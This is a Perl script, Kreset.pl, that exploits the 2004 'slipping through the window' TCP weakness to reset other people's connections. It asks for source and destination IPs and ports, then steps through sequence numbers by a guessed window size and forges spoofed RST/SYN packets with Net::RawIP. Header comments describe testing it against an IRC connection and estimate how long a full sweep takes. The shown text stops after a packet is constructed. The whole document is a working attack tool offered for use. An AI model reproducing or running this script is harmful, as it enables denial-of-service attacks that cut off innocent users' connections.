use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping throught he window meathod described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence
## numbers are
## 32 bit numbers, 32 1's comes out to be 4294967295.
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports,
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window meathod, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot.
EOF

print "\r\nDo you want a port range for the source IP, or the dest IP ";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) {
print "\r\nEnter 1, or 2.\r\n";
exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) {
print "\r\nEnter source port: ";
chomp ($sport = <STDIN>);
if (!($sport)) {
print "\r\nYou must fill in a source port.\r\n";
}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) {
print "\r\nEnter dest port: ";
chomp ($dport = <STDIN>);
if (!($dport)) {
print "\r\nYou must fill in a destination port.\r\n";
exit(1);
}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
print "\r\nYou forgot to fill in one or more fields.\r\n";
exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road
if (!($winsize)) {
$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) { ## from getting through!
$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 100 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) {
if ($i > 4294967295) {
$bport++;
if ($bport > $eport) {
print "Finished\r\n";
exit(0);
}
else {
print "Looping next port.\r\n";
$i = $seqnum;
sleep(2);
next;
}
}
if ($choice == 2) {
$dport = $bport;
}
else {
$sport = $bport;
}

select(undef, undef, undef, $ms);
print "Sequence Number is -> $i port is -> $bport\r\n";

$a = new Net::RawIP;
$a->set({ip => {saddr => "$sip",daddr => "$dip"},
tcp => {source => $sport,dest => $dport,rst => 1,
syn => 1, seq => $i}});